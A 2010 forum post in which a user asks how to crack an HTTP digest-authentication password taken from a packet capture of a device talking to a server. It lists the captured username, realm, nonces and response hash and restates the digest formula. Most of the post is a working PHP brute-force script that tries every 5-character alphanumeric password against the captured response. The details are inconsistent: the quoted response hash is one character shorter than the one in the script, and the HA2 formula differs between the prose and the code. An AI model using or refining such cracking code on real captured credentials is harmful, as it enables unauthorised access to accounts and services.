Digest access authentication password crack?

Post by EpicFailer on Sat Oct 30, 2010 1:44 pm

Hi, thanks for taking the time to read my post.

I performed a packet capture to discover that one of my devices is communicating with a certain server using digest access authentication.
I extracted all the information from the packet capture that I could, and I'm hoping to be able to crack the password.

Here is the information I managed to extract:
username: c7y-basic01
realm: c7y-basic
nonce: 7abeoDCRBAA=e1ad0db74fb39c54879161a7bc8d9276e38482bc
uri: /basic_view/func/get_profile
nc: 00000001
cnonce: 1f04bb201d972929cd468ccd1c9eb530
response: b7898d100de332566faf2b926ce167b
qop: auth


And from what I understand, digest authentication works like this (for this particular application):
HA1 = MD5(username:realm:password)
HA2 = MD5(digestURI)
response = MD5(HA1:nonce:nonceCount:clientNonce:qop:HA2)


It looks to me as if I have all the values that I need except for the password, so I figured it would be possible to perform a brute force attack and check the brute response against the real response.

I've created a script using PHP, which I'm running in a shell currently trying to crack the password, but I have no idea how long the password is, so I don't know if it's working until I find the password.
So while I'm spending my days trying to crack this, I figured I should come and ask some hackers who actually know what they're talking about.

So I would highly appreciate it if someone could tell me whether I'm on the right lines to cracking this password, and if not, what I can do to fix it.

Thanks for all your help!

Here is the script I'm using to try and crack the password (please note, it's not all my work, I grabbed a permutation script off the internet to save time).
Code:
<?php
// Try every 5-character candidate built from this alphabet.
permutations("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", 5);
echo "Password not found.";

// Walk all strings of length $num over $letters, odometer style.
function permutations($letters, $num) {
    $last = str_repeat($letters[0], $num);
    checkPWD($last); // check the starting candidate (e.g. "aaaaa") as well
    while ($last != str_repeat(lastchar($letters), $num)) {
        $last = char_add($letters, $last, $num - 1);
        checkPWD($last);
    }
}

// Increment the character at position $char, carrying to the left on overflow.
function char_add($digits, $string, $char) {
    if ($string[$char] != lastchar($digits)) {
        $string[$char] = $digits[strpos($digits, $string[$char]) + 1];
        return $string;
    } else {
        $string = changeall($string, $digits[0], $char);
        return char_add($digits, $string, $char - 1);
    }
}

// Last character of a string.
function lastchar($string) {
    return $string[strlen($string) - 1];
}

// Set positions $start..$end of $string to $char ($end = 0 means "to the end").
function changeall($string, $char, $start = 0, $end = 0) {
    if ($end == 0) $end = strlen($string) - 1;
    for ($i = $start; $i <= $end; $i++) {
        $string[$i] = $char;
    }
    return $string;
}

// Recompute the digest response for one candidate and compare it to the capture.
function checkPWD($password) {
    echo "Checking: $password\r\n";
    $HA1 = md5("c7y-basic01:c7y-basic:$password");
    $HA2 = md5("GET:/basic_view/func/get_profile");

    $md5 = "$HA1:7abeoDCRBAA=e1ad0db74fb39c54879161a7bc8d9276e38482bc:00000001:1f04bb201d972929cd468ccd1c9eb530:auth:$HA2";

    $response = md5($md5);

    $toMatch = "2b7898d100de332566faf2b926ce167b";

    // Strict comparison, so hex strings are never compared as numbers.
    if ($response === $toMatch) {
        echo "Password is: $password";
        exit;
    }
}

?>